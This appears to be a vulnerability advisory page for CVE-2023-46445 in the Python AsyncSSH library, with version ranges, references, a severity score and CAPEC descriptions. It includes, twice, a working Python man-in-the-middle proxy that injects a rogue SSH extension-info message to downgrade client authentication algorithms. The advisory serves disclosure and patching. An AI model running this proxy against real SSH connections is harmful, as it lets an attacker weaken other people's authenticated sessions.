AsyncSSH Client 2.14.0 (simple_client.py example) connecting to AsyncSSH Server 2.14.0 (simple_server.py example) ```python #!/usr/bin/python3 import socket from threading import Thread from binascii import unhexlify ##################################################################################### ## Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ## ## ## ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ## ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ## ## ## ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ## ##################################################################################### # IP and port for the TCP proxy to bind to PROXY_IP = '127.0.0.1' PROXY_PORT = 2222 # IP and port of the server SERVER_IP = '127.0.0.1' SERVER_PORT = 22 # Length of the individual messages NEW_KEYS_LENGTH = 16 SERVER_EXT_INFO_LENGTH = 676 newkeys_payload = b'\x00\x00\x00\x0c\x0a\x15' def contains_newkeys(data): return newkeys_payload in data # Empty EXT_INFO here to keep things simple, but may also contain actual extensions like server-sig-algs rogue_ext_info = unhexlify('0000000C060700000000000000000000') def insert_rogue_ext_info(data): newkeys_index = data.index(newkeys_payload) # Insert rogue extension info and remove SSH_MSG_EXT_INFO return data[:newkeys_index] + rogue_ext_info + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:] def forward_client_to_server(client_socket, server_socket): try: while True: client_data = client_socket.recv(4096) if len(client_data) == 0: break server_socket.send(client_data) except ConnectionResetError: print("[!] Client connection has been reset. Continue closing sockets.") print("[!] forward_client_to_server thread ran out of data, closing sockets!") client_socket.close() server_socket.close() def forward_server_to_client(client_socket, server_socket): try: while True: server_data = server_socket.recv(4096) if contains_newkeys(server_data): print("[+] SSH_MSG_NEWKEYS sent by server identified!") if len(server_data) < NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH: print("[+] server_data does not contain all messages sent by the server yet. Receiving additional bytes until we have 692 bytes buffered!") while len(server_data) < NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH: server_data += server_socket.recv(4096) print(f"[d] Original server_data before modification: {server_data.hex()}") server_data = insert_rogue_ext_info(server_data) print(f"[d] Modified server_data with rogue extension info: {server_data.hex()}") if len(server_data) == 0: break client_socket.send(server_data) except ConnectionResetError: print("[!] Target connection has been reset. Continue closing sockets.") print("[!] forward_server_to_client thread ran out of data, closing sockets!") client_socket.close() server_socket.close() if __name__ == '__main__': print("--- Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ---") mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mitm_socket.bind((PROXY_IP, PROXY_PORT)) mitm_socket.listen(5) print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...") try: while True: client_socket, client_addr = mitm_socket.accept() print(f"[+] Accepted connection from: {client_addr}") print(f"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.") server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.connect((SERVER_IP, SERVER_PORT)) print("[+] Spawning new forwarding threads to handle client connection.") Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start() Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start() except KeyboardInterrupt: client_socket.close() server_socket.close() mitm_socket.close() ```Impact
Algorithm downgrade during user authentication.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "asyncssh"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.14.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46445"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-349",
"CWE-354"
],
"github_reviewed": true,
"github_reviewed_at": "2023-11-09T18:34:53Z",
"nvd_published_at": "2023-11-14T03:15:09Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nAn issue in AsyncSSH v2.14.0 and earlier allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack.\n\n### Details\n\nThe rogue extension negotiation attack targets an AsyncSSH client connecting to any SSH server sending an extension info message. The attack exploits an implementation flaw in the AsyncSSH implementation to inject an extension info message chosen by the attacker and delete the original extension info message, effectively replacing it.\n\nA correct SSH implementation should not process an unauthenticated extension info message. However, the injected message is accepted due to flaws in AsyncSSH. AsyncSSH supports the server-sig-algs and global-requests-ok extensions. Hence, the attacker can downgrade the algorithm used for client authentication by meddling with the value of server-sig-algs (e.g. use of SHA-1 instead of SHA-2).\n\n### PoC\n\n\u003cdetails\u003e\n \u003csummary\u003eAsyncSSH Client 2.14.0 (simple_client.py example) connecting to AsyncSSH Server 2.14.0 (simple_server.py example)\u003c/summary\u003e\n\n ```python\n #!/usr/bin/python3\n import socket\n from threading import Thread\n from binascii import unhexlify\n \n #####################################################################################\n ## Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ##\n ## ##\n ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ##\n ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ##\n ## ##\n ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##\n #####################################################################################\n \n # IP and port for the TCP proxy to bind to\n PROXY_IP = \u0027127.0.0.1\u0027\n PROXY_PORT = 2222\n \n # IP and port of the server\n SERVER_IP = \u0027127.0.0.1\u0027\n SERVER_PORT = 22\n \n # Length of the individual messages\n NEW_KEYS_LENGTH = 16\n SERVER_EXT_INFO_LENGTH = 676\n \n newkeys_payload = b\u0027\\x00\\x00\\x00\\x0c\\x0a\\x15\u0027\n def contains_newkeys(data):\n return newkeys_payload in data\n \n # Empty EXT_INFO here to keep things simple, but may also contain actual extensions like server-sig-algs\n rogue_ext_info = unhexlify(\u00270000000C060700000000000000000000\u0027)\n def insert_rogue_ext_info(data):\n newkeys_index = data.index(newkeys_payload)\n # Insert rogue extension info and remove SSH_MSG_EXT_INFO\n return data[:newkeys_index] + rogue_ext_info + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:]\n \n def forward_client_to_server(client_socket, server_socket):\n try:\n while True:\n client_data = client_socket.recv(4096)\n if len(client_data) == 0:\n break\n server_socket.send(client_data)\n except ConnectionResetError:\n print(\"[!] Client connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_client_to_server thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n def forward_server_to_client(client_socket, server_socket):\n try:\n while True:\n server_data = server_socket.recv(4096)\n if contains_newkeys(server_data):\n print(\"[+] SSH_MSG_NEWKEYS sent by server identified!\")\n if len(server_data) \u003c NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:\n print(\"[+] server_data does not contain all messages sent by the server yet. Receiving additional bytes until we have 692 bytes buffered!\")\n while len(server_data) \u003c NEW_KEYS_LENGTH + SERVER_EXT_INFO_LENGTH:\n server_data += server_socket.recv(4096)\n print(f\"[d] Original server_data before modification: {server_data.hex()}\")\n server_data = insert_rogue_ext_info(server_data)\n print(f\"[d] Modified server_data with rogue extension info: {server_data.hex()}\")\n if len(server_data) == 0:\n break\n client_socket.send(server_data)\n except ConnectionResetError:\n print(\"[!] Target connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_server_to_client thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n if __name__ == \u0027__main__\u0027:\n print(\"--- Proof of Concept for the rogue extension negotiation attack (ChaCha20-Poly1305) ---\")\n mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mitm_socket.bind((PROXY_IP, PROXY_PORT))\n mitm_socket.listen(5)\n \n print(f\"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...\")\n \n try:\n while True:\n client_socket, client_addr = mitm_socket.accept()\n print(f\"[+] Accepted connection from: {client_addr}\")\n print(f\"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.\")\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"[+] Spawning new forwarding threads to handle client connection.\")\n Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start()\n Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start()\n except KeyboardInterrupt:\n client_socket.close()\n server_socket.close()\n mitm_socket.close()\n ```\n\u003c/details\u003e\n\n### Impact\n\nAlgorithm downgrade during user authentication.",
"id": "GHSA-cfc2-wr2v-gxm5",
"modified": "2025-11-04T16:46:51Z",
"published": "2023-11-09T18:34:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/security/advisories/GHSA-cfc2-wr2v-gxm5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46445"
},
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/commit/83e43f5ea3470a8617fc388c72b062c7136efd7e"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-cfc2-wr2v-gxm5"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/asyncssh/PYSEC-2023-237.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/ronf/asyncssh"
},
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00042.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ME34ROZWMDK5KLMZKTSA422XVJZ7IMTE"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20231222-0001"
},
{
"type": "WEB",
"url": "https://www.terrapin-attack.com"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "AsyncSSH Rogue Extension Negotiation"
}
No mitigation information available for this CWE.
CAPEC-141: Cache Poisoning
An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.
CAPEC-142: DNS Cache Poisoning
A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.
CAPEC-75: Manipulating Writeable Configuration Files
Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.